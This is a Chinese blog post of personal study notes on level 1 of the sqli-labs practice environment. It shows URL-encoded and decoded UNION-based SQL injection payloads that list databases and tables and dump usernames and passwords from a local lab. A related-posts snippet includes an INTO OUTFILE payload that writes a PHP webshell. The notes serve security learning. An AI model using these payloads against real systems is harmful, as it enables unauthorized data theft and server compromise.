sqli-labs学习笔记(1)

最新推荐文章于 2025-08-05 17:49:12 发布
最新推荐文章于 2025-08-05 17:49:12 发布
阅读量414 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_49248030/article/details/116015414
本文记录了如何在sqli-labs第一关中识别字符型注入,包括判断方法和具体操作步骤,如利用url编码进行数据库查找、定位users表并获取密码。作者强调这是个人学习笔记,非官方教程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

sqli-labs

记录一下自己的学习,简单的做一下笔记

第一关

前言

记录一下sqli-labs第一关的通过心得,不作为参考和学习资料,只求自己来时翻的时候能够看懂

一、sqli-labs,第一关,如何判断为字符型注入?

判断页面是否存在sql注入最好的方法就是在后面加上?id='1,因为无论你是字符型注入还是数值型注入页面都会返回错误。
在这里插入图片描述
根据页面提示可以知道页面存在sql注入,但是因为输入有误所以会报错,如果没有sql注入的页面就会直接返回404.判断为数值型的方法就是在后面加上?id=x and 1=1然后看页面是否正常运行,如果页面正常运行我们在修改一下?id=x and 1=2如果页面出现错误就说明这是数值型注入,字符型注入的判断方法在后面输入?id='1看页面返回的消息里面给1后面自动补上单引号没有,如果补上了就说明是字符型注入。
在这里插入图片描述

二、通关步骤

1.找到数据库

当我们发现一个页面存在sql注入的时候我们可以想一想我们的步骤,首先是查找数据库,然后进入数据库找到敏感信息表,最后就进入表查看相关信息。

查看数据库命令:

http://127.0.0.1/sql1/Less-1/?id=%27%20union%20select%20null,(select%20group_concat(schema_name)%20from%20information_schema.schemata),null%23

在这里插入图片描述
这里说一下代码是经过url编码的,这里我把没有经过编码的发一下后面的如果感兴趣可以自己去解码看看,后面为什么是%23实际上其实是#,达到闭合的目的,你也可以选择用单引号。

' union select null,(select group_concat(schema_name) from information_schema.schemata),null#

2.查找表

通过以上我们找到的数据库,我们选择一个数据库secunty为例进入:

%27union select null%2Cnull%2C(select group_concat(table_name) from information_schema.tables where table_schema%3D0x7365637572697479)%23

编译前:

'union select null,null,(select group_concat(table_name) from information_schema.tables where table_schema=0x7365637572697479)#

需要注意的是我们后面的tab_schema=的是一个十六进制的数字,0x7365637572697479转换为字符型就是secunty这个数据库,如果大家要查其他数据库也需要进行十六进制编码才可以噢。

在这里插入图片描述
进入secunty数据库以后我们发现里面有一个users表,里面肯定有用户名和密码相关信息。

3.进入users表获得密码

%27union select null%2Cnull%2C(select group_concat(username%2C0x3a%2Cpassword) from users)%23

在这里插入图片描述
0x3a: 0x是十六进制标志,3a是十进制的58,是ascii中的 ‘:’ ,用以分割pasword和username。

4.补充

上面用的sql里面有几个地方我稍微补充一下,以防我后面自己忘了。。。
group_concat和concat以及concat_ws,
concat就是拼接各个字段的值然后把组合在一起。select concat (id, name, score) as info from student 组合后字段与字段之间没有空隙。
concat_ws:里面可以添加字符 也可以显示出来。
group_concat:达到去重的效果,并且可以把 重复字段的值放在一起。
可能group_concat不太好理解,大家感兴趣可以自己去搜一下。

总结

sql语句有很多种,不一定用我以上所说的sql语句,大家也可以自行去寻找其他的sql来进行尝试,本人所有文章只是自己个人学习笔记,不作为参考资料。

Q00000001
关注
Qt5.13.1版本 QSerialport不产生readyRead信号的bug
weixin_42485732的博客
12-04 1227
###纯属Qt版本bug,更换版本即可,一摸一样的代码换了版本跑的很好
sqli-labs学习笔记
shayebudon的博客
10-06 1877
简单的SQL注入 选择:2017 A1 Extract Data-User info 在登录界面就可以使用SQL语句,以此来检查下平台是否搭建成功 用户名框输入一个“\”,点击确认键,可以看到报错信息,并且可以看到SQL语句,说明存在SQL注入,此处无过滤。 可以通过查看报错信息中的SQL语句,选择进行SQL注入的方式,这里可以看到这样的一行: 那么,选择在用户名输入处输入“‘ or 1=1 #”,通过使用“or”字句将输入匹配取消,并使用“#”将后续语句中对passwo...
sqli-labs新手学习笔记(持续更新)
zydbk123456的博客
10-05 511
sqli-labs环境安装 下载地址:https://github.com/Audi-1/sqli-labs 同时需要安装phpstudy 开始前遇到的问题 启动phpstudy,发现apache服务可以正常启动,但MySQL就不行。但是打开任务管理器发现MySQL服务一直在正常运行。查了一下有这种问题原因,可能是因为之前已经安装了MySQL服务,需要在cmd 窗口下输入 sc delete m...
二次注入——sqli-labs24
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
08-02 4511
首先,选择注册 盲猜有个admin的账号,所以注册一个admin '#的账号。密码是12345 (上帝视角)此时admin的密码是admin 登录 然后为admin '#修改密码为123 修改成功(此时真的是修改admin '#的密码吗) (又一次上帝视角)此时admin的密码成了123,而admin '#的密码并没有重置 这就是二次注入: 原理就是php把…………………… sql……………… 至于为什么会有 ...
sqli-labs-master第24
m_ing
05-17 1399
前言:前面我们遇到了各式各样的sqlmap注入,我们接下来看看有什么牛鬼蛇神 第24关 http://192.168.89.139/sqli-labs-master/Less-24/ 看到提示我们“请登录以继续” 我们用正常的admin登录,提示我们可以更改密码。 此例子中我们的步骤是注册一个admin’#的账号,接下来登录该帐号后进行修改密码。此时修改的就是admin的密码。 但是我的脑子一片浆糊,我们在整理下思路 本关为二次排序注入 二次排序注入也成为存储型的注入,就是将可能导致sql注入的字符先存
Sqli-labs靶场笔记1(Less-1 SQL注入基本操作)
m0_52233414的博客
03-31 569
sqli-labs靶场使用的是mysql数据库,所以在打之前,我们要了解一下mysql数据库的结构,mysql数据库5.0以上版本有一个自带的数据库叫做information_schema,该数据库下面有两个表一个是tables和columns。tables这个表的table_name字段下面是所有数据库存在的表名。table_schema字段下是所有表名对应的数据库名。columns这个表的colum_name字段下是所有数据库存在的字段名。columns_schema字段下是所有表名对应的数据库
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs学习笔记(十一)less 32-37 宽字节注入
闵行小鱼塘
09-18 775
继续学习sqli-labs,本篇是less 32-37
Sqli-labs靶场搭建(适合新手小白围观)
热门推荐
记录开发和安全学习过程中的点点滴滴
09-12 1万+
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs学习笔记(六)less 17 绕过过滤
闵行小鱼塘
09-10 794
继续学习sqli-labs,本篇是less17
sqli-labs通关笔记
怪味巧克力的博客
05-19 573
文章目录Basic InjectionsLess-1 '字符型注入-联合查询Less-2 布尔注入-联合查询Less-3 字符注入-联合查询Less-4 字符注入-联合查询Less-5 字符注入-报错查询Less-6 字符注入-错误回显Less-7 文件读写Less-8 盲注和文件读写Less-9 盲注Less-10 盲注Less-11 单引号POST注入Less-12 双引号POST注入Less-13 双注入 - 字符型 - 变形Less-14 双注入 - 双引号 - 字符串Less-15 盲注/布尔
Sqli-labs靶场详细攻略Less 1-5
qq_41755084的博客
10-09 1681
Sqli-labs靶场详细攻略
SQL注入之sqli-labs-master Less-1详解
luoshiyong123的博客
03-28 1691
1.读题 一开始是这个界面,提示输入id,这里能够输入的地方只有http请求里边,所以输入: http://localhost./sqll/sqli-labs-master/Less-1/?id=1试一下,?id=1是httpget方法的格式。然后: 得到密码,当把id换成2,3,4都可以得到对应password。但是要实现查询各种信息还不行。接下来找注入点 2.找注入点 id=...
sqli-labs大详解
gankjk的博客
10-19 6809
Less-1 GET - Error based - Single quotes - String(基于错误的GET单引号字符型注入) 首先输入参数?id=1,这时页面正常显示,并不报错。 这时我们输入?id=1‘时出现报错,可以判断它是单引号注入 常规注入,判断字段数,当我们order by10时,发生错误,然后我们用二分法判断有几个字段(向上取整)。 当我们到order by 3 时没有报错,这时候我们试试order by 4,发现报错,说明只有三个字段。 然后我们看回显...
SQL 存储过程 CS_00000001 生成流水帐号
老枪
11-09 1018
如果要得到如CS_00000001,CS_00000002,CS_00000003的流水帐号如下存储过程Create PROCEDURE [dbo].[sp_Room_Code]       @CodeID varchar(11) output  --// CS_00000001 流水帐号的长度,这里我用11位AS   declare @num int                      -
SAP-ABAP: Open SQL集合函数COUNT(统计行数)、SUM(数值求和)、AVG(平均值)、MAX/MIN(极值)深度指南
最新发布
baidu_35680696的博客
08-05 31
SAP-ABAP: Open SQL集合函数COUNT(统计行数)、SUM(数值求和)、AVG(平均值)、MAX/MIN(极值)深度指南
MSQL-聚簇索引与非聚簇索引的比较
draymond7107的博客
08-02 467
聚簇索引与非聚簇索引比较
【赵渝强老师】达梦数据库的DMSQL
赵渝强老师优快云博客主页
08-04 411
存储过程和存储函数在功能上相当于客户端的一段SQL批处理程序,但是在许多方面有着后者无法比拟的优点,它为用户提供了一种高效率的编程手段,成为现代数据库系统的重要特征。可以认为这种技术是执行DMSQL程序的一种机器,它可以接受任何有效的DMSQL程序,按照语言本身所规定的语义执行,并将结果返回给客户。DMSQL程序可以分为存储模块和客户端DMSQL程序两类。在DMSQL程序中,包括一整套数据类型、条件结构、循环结构和异常处理结构等,DMSQL程序中可以执行SQL语句,SQL语句中也可以使用DMSQL函数。
SQL注入学习之路:sqli-labs靶场实战解析
"sqli-labs靶场练习笔记涵盖了从2关到24关的SQL注入学习内容,适合初学者参考,涉及单引号、双引号注入,布尔盲注,数据库名、表名、列名的探测,以及利用注入进行文件写入和信息获取等技能。" 在SQL注入的学习过程...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值